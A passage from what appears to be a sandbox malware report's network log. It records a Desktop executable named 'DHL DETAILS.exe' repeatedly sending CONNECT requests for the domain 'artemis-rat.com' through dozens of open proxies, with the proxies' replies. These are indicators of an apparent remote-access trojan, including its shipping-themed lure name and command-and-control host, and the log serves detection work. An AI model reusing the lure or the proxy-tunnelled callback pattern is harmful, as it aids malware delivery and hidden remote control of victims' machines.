                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1607192.168.2.554726106.105.218.244806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.937040091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1608192.168.2.55494338.54.95.1931286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.937346935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:22.157354116 CET39INHTTP/1.1 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1609192.168.2.554038218.65.6.15031286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.938361883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.307547092 CET704INHTTP/1.1 502 Bad Gateway
                                                                                    Server: huawei
                                                                                    Date: Sat, 09 Mar 2024 12:01:40 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 553
                                                                                    Connection: keep-alive
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 68 75 61 77 65 69 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>huawei</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1610192.168.2.55476980.249.112.162806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.950077057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.672277927 CET343INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.14.0 (Ubuntu)
                                                                                    Date: Sat, 09 Mar 2024 12:14:20 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 182
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1611192.168.2.554121134.122.22.23331286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.950218916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1612192.168.2.554819185.110.190.99806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.950412035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1613192.168.2.554175114.129.2.8280816352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.950987101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:22.973809958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:23.238950014 CET72INHTTP/1.1 200 Connection established
                                                                                    Proxy-Agent: Fortinet-Proxy/1.0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1614192.168.2.554847193.84.89.20284436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.957827091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1615192.168.2.5548341.15.62.1256786352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.960251093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.723980904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1616192.168.2.55476051.161.131.84586126352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.960444927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1617192.168.2.55423350.63.12.101324236352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.961898088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1618192.168.2.554261162.214.191.59582756352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.962061882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1619192.168.2.553935180.250.159.4941536352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.962068081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1620192.168.2.55485237.235.53.20867896352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.966207027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.332730055 CET339INHTTP/1.1 403 Forbidden
                                                                                    Server: squid/4.7
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:20 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 5
                                                                                    X-Squid-Error: TCP_RESET 0
                                                                                    Vary: Accept-Language
                                                                                    Content-Language: en
                                                                                    X-Cache: MISS from proxy.wakoopa.com
                                                                                    Via: 1.1 proxy.wakoopa.com (squid/4.7)
                                                                                    Connection: keep-alive
                                                                                    Data Raw: 72 65 73 65 74
                                                                                    Data Ascii: reset


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1621192.168.2.554820103.166.141.74200746352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.969381094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.332349062 CET39INHTTP/1.1 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1622192.168.2.554987104.16.107.142806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.969384909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.124131918 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:20 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1623192.168.2.554822120.37.121.20990916352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.986418009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.724045992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.086081982 CET325INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.12.1
                                                                                    Date: Sat, 09 Mar 2024 12:15:00 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 173
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1624192.168.2.55481243.231.22.228806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.987297058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1625192.168.2.550277167.99.131.11806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.994731903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:23.145282984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:26.177046061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.156878948 CET806INHTTP/1.1 500 Internal Server Error
                                                                                    Date: Sat, 09 Mar 2024 11:24:49 GMT
                                                                                    Server: Apache/2.4.29 (Ubuntu)
                                                                                    Content-Length: 614
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 77 65 62 6d 61 73 74 65 72 40 6c 6f 63 61 6c 68 6f 73 74 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1626192.168.2.55495423.137.248.197806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.998344898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1627192.168.2.554997104.27.12.22806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.003089905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.157778025 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:20 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1628192.168.2.555082178.128.157.1144436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.007863045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1629192.168.2.555083178.128.157.1144436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.008455992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1630192.168.2.555086178.128.157.1144436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.009151936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1631192.168.2.555089178.128.157.1144436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.010457039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1632192.168.2.55509643.153.172.764436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.014226913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
